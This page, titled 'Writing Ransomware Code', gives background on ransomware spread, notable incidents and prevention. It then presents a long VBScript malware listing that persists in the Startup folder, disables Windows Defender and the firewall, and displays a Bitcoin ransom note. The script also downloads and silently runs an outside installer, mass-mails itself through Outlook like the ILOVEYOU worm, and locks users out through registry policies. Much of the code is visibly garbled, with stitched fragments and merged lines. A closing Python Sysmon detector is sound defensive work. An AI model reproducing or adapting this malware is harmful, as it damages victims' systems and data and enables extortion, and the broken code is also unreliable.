Writing Ransomware Code

Ransomware

Ransomware is a newer class of computer virus with extremely strong destructive and propagation capabilities. It spreads and attacks through many different channels, posing a serious threat to, and inflicting heavy losses on, individuals, enterprises and society.

Ransomware can spread through phishing email. The attacker embeds the ransomware in a document, image or other attachment of a phishing email, or places a malicious ransomware link in the message body. Once the user opens the attachment or clicks the link, the malware loads and installs itself automatically and then threatens the security of the entire network.

Planting malware on websites (drive-by download) is another common vector. The attacker compromises a website and plants malicious code in it, lures users to visit the site and trigger that code, which redirects the page the user is viewing to a ransomware download link and executes it, thereby implanting ransomware on the user's device.

Security vulnerabilities are exploited as well. Attackers use weak passwords, remote code execution and other vulnerabilities in network products (most of them already public, already patched by the vendor, but not yet fixed on the victim's systems) to break into the user's internal network, obtain administrator privileges and then actively spread the ransomware.

Removable media can also be a propagation path. The attacker hides the original files on a USB flash drive, portable hard disk or similar removable storage and creates shortcuts with the same drive letter, icon and names as the hidden items; once the user clicks one, it automatically runs the ransomware, or runs a trojan dedicated to collecting device information and sending it back, so that a targeted extortion can be carried out later.

The software supply chain may be abused. Attackers exploit the trust between software vendors and their users: they compromise the vendor's servers, then use the distribution and update mechanisms of the supply chain to hijack or tamper with legitimate software while it is being delivered or upgraded, bypassing the user's security controls and spreading ransomware.

Remote desktop intrusion is another route. Attackers typically obtain the remote-login username and password of the target server through weak passwords or brute force, then log in over the Remote Desktop Protocol and implant the ransomware. Once logged in with control of the server, they can use it as a pivot to spread ransomware further inside the user's internal network.

Once ransomware infects a computer, files of almost every format on the disk are encrypted, leaving enterprises, schools and individual users with large numbers of important files that are unusable or even leaked, which seriously disrupts daily work and life. A typical infection leaves important files unreadable, critical data corrupted and the computer locked and unusable. To direct the victim to pay, the ransomware also drops a ransom note in a conspicuous place such as the desktop; the victim must pay a large ransom to obtain the decryption key and restore the system and data files, and in most cases even paying does not guarantee that the data is recovered. Ransomware is therefore characterised by a high cost of data recovery and a very low likelihood of recovery.

Common ransomware types include file-encrypting ransomware, data-stealing ransomware, system-encrypting ransomware and screen-locking ransomware.

Ransomware attacks occur frequently worldwide. For example, the WannaCry ransomware of five years ago (May 2017) struck all over the world: within a few days more than 200,000 Windows computers in 150 countries were hit, causing losses in the billions of dollars. According to available reports, the main victims of that incident included the UK's National Health Service (NHS), the Spanish telecom operator Telefonica and other telecom providers, banks, railway systems and even internal networks of the Russian government. WannaCry was a global, multi-pronged cyber attack that marked a turning point in the security landscape, inspired attackers around the world and shaped the entire threat landscape for the following five years, right up to the present.

In recent years ransomware attacks have become even more frequent. A series of attacks has severely disrupted the information systems that support production and daily life in finance, energy, transport and other sectors, and enterprises in key industries such as healthcare, education, finance and technology worldwide are regular "guests" of ransomware, with business standstills and factory shutdowns as the consequences. For example, in early May this year the pipeline network of Colonial Pipeline, the largest fuel pipeline operator in the United States, was attacked; the criminal group held its data "hostage" to force a ransom payment, and the US government declared a national emergency in response. Other victims included the District of Columbia police department, hospitals treating COVID-19 patients and manufacturers, but these organisations did not disclose the attacks publicly, for fear that their security capabilities would be questioned.

To prevent ransomware, the following measures can be taken: regularly back up important data and files; promptly update and upgrade the operating system and applications to fix medium- and high-severity vulnerabilities; install genuine antivirus software, keep its signature database current and run full scans regularly; disable autorun for USB drives, portable hard disks and optical discs in the system, and do not use or open USB drives, discs, email, links or files of unknown origin; avoid weak passwords, set a different password for every server and endpoint, use a high-complexity mix of upper- and lower-case letters, digits and special characters, and make passwords at least 8 characters long; do not download or install pirated software, cracked software or activation tools from the internet.

Code implementation

Do
Set WshShell = CreateObject(""WScript.Shell"")" & vbCrLf & _
Set FSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
scriptPath = WScript.ScriptFullName" & vbCrLf & _
startupFolder = WshShell.SpecialFolders(""Startup"")" & vbCrLf & _
startupScriptPath = startupFolder & ""\""" & " & FSO.GetFileName(scriptPath)" & vbCrLf & _
If Not FSO.FileExists(startupScriptPath) Then" & vbCrLf & _
FSO.CopyFile scriptPath, startupScriptPath" & vbCrLf & _
Dim WshShell, http, response, url, objShell, objFSO, strUserName, objStream, objXMLHTTP
Set WshShell = CreateObject("WScript.Shell")

Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")

'GET THE desktopPath
desktopPath = WshShell.SpecialFolders("Desktop")

' secondScriptPath
secondScriptName = "SecondScript.vbs"
secondScriptPath = desktopPath & "\" & secondScriptName

'Content
scriptContent = _
"Set WshShell = CreateObject(""WScript.Shell"")" & vbCrLf & _
"Set FSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"scriptPath = WScript.ScriptFullName" & vbCrLf & _
"startupFolder = WshShell.SpecialFolders(""Startup"")" & vbCrLf & _
"startupScriptPath = startupFolder & ""\""" & " & FSO.GetFileName(scriptPath)" & vbCrLf & _
"If Not FSO.FileExists(startupScriptPath) Then" & vbCrLf & _
"    FSO.CopyFile scriptPath, startupScriptPath" & vbCrLf & _
"    WshShell.Popup ""Congragelations , We have disabled your antivirus settings。"", 2, ""脚本复制成功"", 64" & vbCrLf & _
"End If" & vbCrLf & _
"Do" & vbCrLf & _
"    Set colDrives = FSO.Drives" & vbCrLf & _
"    For Each objDrive in colDrives" & vbCrLf & _
"        If objDrive.DriveType = 1 Then" & vbCrLf & _
"            If objDrive.IsReady Then" & vbCrLf & _
"                WshShell.Popup ""Tying to copy your files? NO WAY!!!Q: "" & objDrive.DriveLetter & "":""" & vbCrLf & _
"                WshShell.Run ""cmd /c eject "" & objDrive.DriveLetter, 0, True" & vbCrLf & _
"                Exit Do" & vbCrLf & _
"            End If" & vbCrLf & _
"        End If" & vbCrLf & _
"    Next" & vbCrLf & _
"    WScript.Sleep 5000" & vbCrLf & _
"Loop"

' Creat the second script
Set scriptFile = FSO.CreateTextFile(secondScriptPath, True)
scriptFile.WriteLine(scriptContent)
scriptFile.Close

' Run the second script
WshShell.Run secondScriptPath, 1, False

' 1. Disable Windows Defender and Firewall
On Error Resume Next
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", 1, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PrivateProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\LowRiskFileTypes", ".txt;.docx;.xlsx;.wps;.pdf;", "REG_SZ"
OperationRegistry.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
On Error GoTo 0

' 2. Display Ransom Message
Const bitcoinAddress = "dencrypt@.com"
Const amountRequired = "0.5"
WScript.Echo "Your important files have been locked. Send " & amountRequired & " Bitcoin to " & bitcoinAddress & " to unlock them. We are installing a trading system for you , please go to download file to check."

' 3. Define Constants for Python and Huobi Installation
Const DOWNLOAD_URL_PYTHON = "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe"
Const INSTALLER_NAME_PYTHON = "python-3.8.10-amd64.exe"
Const LIBRARIES = "huobi-client"
Const DOWNLOAD_URL_HUOBI = "https://example.com/huobi-client-installer.exe" 
Const INSTALLER_NAME_HUOBI = "huobi-client-installer.exe"

' 4. Setup File System and Paths
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
strUserName = objShell.ExpandEnvironmentStrings("%USERNAME%")
Const PYTHON_PATH = "C:\Users\" & strUserName & "\AppData\Local\Programs\Python\Python38"
Const PIP_COMMAND = PYTHON_PATH & "\Scripts\pip.exe"
Const INSTALLER_PATH_PYTHON = "C:\Temp\" & INSTALLER_NAME_PYTHON
Const INSTALLER_PATH_HUOBI = "C:\Temp\" & INSTALLER_NAME_HUOBI

' 5. Create Temp Directory if Not Exists
If Not objFSO.FolderExists("C:\Temp") Then
    objFSO.CreateFolder("C:\Temp")
End If

' 6. Download Python Installer
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", DOWNLOAD_URL_PYTHON, False
objXMLHTTP.sEnd IfobjXMLHTTP.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1 ' Binary
objStream.Write objXMLHTTP.responseBody
objStream.Position = 0 ' Reset position to the start
objStream.SaveToFile INSTALLER_PATH_PYTHON, 2 ' Save as overwrite
objStream.Close
WScript.Echo "Downloaded Python installer."
Else
WScript.Echo "Failed to download Python installer."
WScript.Quit
End If

' 7. Install Python
objShell.Run INSTALLER_PATH_PYTHON & " /quiet InstallAllUsers=0 PrependPath=1 TargetDir=""" & PYTHON_PATH & """", 0, True

WScript.Sleep 5000 ' Wait for 5 seconds to ensure installation is complete

' 8. Install Python Libraries
If objFSO.FileExists(PIP_COMMAND) Then
objShell.Run “cmd.exe / c @echo off”
objShell.Run "cmd.exe /c """ & PIP_COMMAND & """ install " & LIBRARIES, 1, True
objShell.Run “cmd.exe / c pip install huobi - client"
WScript.Echo "Installed Python libraries."
Else
WScript.Echo "pip not found. Ensure Python is installed correctly."
End If

' 9. Clean Up Python Installer
objFSO.DeleteFile INSTALLER_PATH_PYTHON
WScript.Echo "Cleaned up Python installer file."

' 10. Download Huobi Client Installer
objXMLHTTP.open "GET", DOWNLOAD_URL_HUOBI, False
objXMLHTTP.sEnd IfobjXMLHTTP.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1 ' Binary
objStream.Write objXMLHTTP.responseBody
objStream.Position = 0 ' Reset position to the start
objStream.SaveToFile INSTALLER_PATH_HUOBI, 2 ' Save as overwrite
objStream.Close
WScript.Echo "Downloaded Huobi client installer."
Else
WScript.Echo "Failed to download Huobi client installer."
WScript.Quit
End If

' 11. Install Huobi Client
objShell.Run INSTALLER_PATH_HUOBI & " /quiet", 0, True
WScript.Echo "Installed Huobi client."

' 12. Clean Up Huobi Installer
objFSO.DeleteFile INSTALLER_PATH_HUOBI
WScript.Echo "Cleaned up Huobi installer file."

' 13. Check Payment Status via BTCScan API
Set http = CreateObject("MSXML2.XMLHTTP")
Const btcScanAPI = "https://btcscan.org/tx/recent”
url = btcScanAPI & "?address=" & bitcoinAddress & "&amount=" & amountRequired

On Error Resume Next
http.Open "GET", url, False
http.SEnd IfErr.Number <> 0 Then
WScript.Echo "Error connecting to BTCScan API. Please check your network connection."
WScript.Quit
End If
On Error GoTo 0

If http.Status = 200 Then
response = http.responseText
If InStr(response, """status"":""paid""") > 0 Then
OperationRegistry.RegDelete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\LowRiskFileTypes"
Dim fso, startupFolder, scriptName, startupScript

' Create the FileSystemObject
Set fso = CreateObject("Scripting.FileSystemObject")

' Get the Startup folder path
startupFolder = fso.GetSpecialFolder(2) ' 2 denotes the Startup folder

' Get the file name of the current script
scriptName = fso.GetFile(WScript.ScriptFullName).Name

' Build the full path of this script inside the Startup folder
startupScript = fso.BuildPath(startupFolder, scriptName)

' Check whether the startup entry exists and delete it if so
If fso.FileExists(startupScript) Then
    fso.DeleteFile startupScript
End If
WScript.Echo "Payment received. Your files have been unlocked."
Else
WScript.Echo "Payment not detected. Files remain locked."
End If
Else
WScript.Echo "Failed to get a valid response from BTCScan API. Status code: " & http.Status
End If

WScript.Echo "Attempted to disable antivirus and firewall settings."
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="I love you	"
Mail.Body="LOVE . please open this love letter@!"
Mail.Attachments.Add(dir2&"LOVE LETTER.TXT.vbs")
Mail.Send
Next
ol.Quit
WScript.Sleep 200
Loop
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\Shell:Startup\LOVE LETTER.TXT.vbs")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","I LOVE YOU S0----"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","YOU ARE HACKED!"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://liudemin.myetang.com"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
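From a defender's side, the script above leaves three kinds of footprints: policy values that switch off Windows Defender and the firewall, Explorer/System policies that lock the user out of the desktop, and a script copied into the Startup folder. Each of those actions shows up in Sysmon telemetry as a registry value-set event (Event ID 13) or a file-create event (Event ID 11). The Python below is an added detection example written for this page, not code from the original post: it classifies constructed events in Sysmon's field shape (Image, TargetObject, Details, TargetFilename). The sample events, SIDs, user names and the severity labels are assumptions made for the example.

```python
"""Added defender-side example (editor's code, not from the page): classify
Sysmon-shaped registry and file-create events for the tampering patterns the
VBScript above performs. All sample events are constructed."""
import re

# Policy values the script writes, with the data value that means "control off".
# Keys are normalised (HKU\<SID> -> HKCU, lower-case) by normalize_key() below.
_TAMPER_RAW = {
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware": 1,
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring": 1,
    r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall": 0,
    r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PrivateProfile\EnableFirewall": 0,
    r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile\EnableFirewall": 0,
}

# Explorer / System policy value names the script sets to lock the user out.
LOCKOUT_VALUES = {"norun", "noclose", "nodesktop", "nologoff", "nodrives",
                  "nosettaskbar", "noviewcontextmenu", "nofilemenu",
                  "nosetfolders", "disableregistrytools"}

SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta")


def normalize_key(path: str) -> str:
    """Map the hive spellings used by Sysmon and by the script onto one form."""
    p = path.replace("HKEY_LOCAL_MACHINE", "HKLM").replace("HKEY_CURRENT_USER", "HKCU")
    parts = p.split("\\")
    if parts[0].upper() == "HKU" and len(parts) > 2:  # Sysmon logs HKU\<SID>\Software\...
        parts = ["HKCU"] + parts[2:]
    return "\\".join(parts).lower()


TAMPER = {normalize_key(k): v for k, v in _TAMPER_RAW.items()}


def parse_dword(details):
    """Sysmon renders REG_DWORD data as 'DWORD (0x00000001)'; return the int or None."""
    m = re.search(r"DWORD \(0x([0-9A-Fa-f]+)\)", details or "")
    return int(m.group(1), 16) if m else None


def classify(event: dict) -> list:
    """Return finding strings for one Sysmon-shaped event (empty list if benign)."""
    findings = []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if event["EventID"] == 13:
        target = normalize_key(event["TargetObject"])
        data = parse_dword(event.get("Details"))
        key, _, name = target.rpartition("\\")
        # A write is only a finding when the data matches the "off" value; a
        # management agent re-asserting the enabled value must not fire.
        if target in TAMPER and data == TAMPER[target]:
            findings.append(f"HIGH defender/firewall disabled via {event['TargetObject']} by {image}")
        if (name in LOCKOUT_VALUES and data not in (None, 0)
                and key.endswith(("\\policies\\explorer", "\\policies\\system"))):
            findings.append(f"HIGH user lock-out policy {name} set by {image}")
        if name == "lowriskfiletypes" and key.endswith("\\policies\\attachments"):
            findings.append(f"MEDIUM attachment-manager LowRiskFileTypes changed by {image}")
    elif event["EventID"] == 11:
        target = event["TargetFilename"]
        low = target.lower()
        if "\\start menu\\programs\\startup\\" in low and low.endswith(SCRIPT_EXTENSIONS):
            findings.append(f"HIGH script dropped in Startup folder: {target} by {image}")
    return findings


def scan(events) -> list:
    """Run classify() over a sequence of events; return (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


# Constructed sample telemetry (SIDs, user names and paths are made up).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 11, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOVE LETTER.TXT.vbs"},
    # Benign: a management agent re-asserting the policy with the "enabled" value 0.
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000000)"},
    # Benign: ordinary document creation.
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Run as-is it reports three findings (events 0, 1 and 2) and stays silent on the two benign events. The value check in `classify()` is the part worth keeping: the same policy path written with the opposite value is the normal managed state, so matching on the path alone would page on every Group Policy refresh. The hive normalisation matters because the script writes both `HKCU\...` and `HKEY_CURRENT_USER\...`, while Sysmon records per-user keys as `HKU\<SID>\...`.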
